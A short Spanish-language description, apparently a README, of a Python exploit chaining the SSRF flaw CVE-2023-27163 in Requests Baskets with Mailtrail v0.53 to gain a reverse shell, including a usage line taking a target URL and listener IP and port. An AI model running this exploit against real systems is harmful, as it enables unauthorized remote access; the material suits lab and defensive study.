
Exploit en Python que encadena SSRF CVE-2023-27163 en Requests Baskets con Mailtrail v0.53 para reenviar servicios internos y ejecutar una reverse shell.
El siguiente exploit abusa de la vulnerabilidad SSRF de Requests Baskets v1.2.1 para redirigir la aplicación interna que se ejecuta en 127.0.0.1:80 hacia la aplicación externa en /pwned. Una vez que la aplicación Mailtrail v0.53 haya sido redirigida, ejecutará un comando de reverse shell contra ella y en unos pocos segundos el usuario debería obtener una reverse shell en la máquina.
python3 ./exploit http://10.10.10.10:55555 LISTENER-IP LISTENER-PORT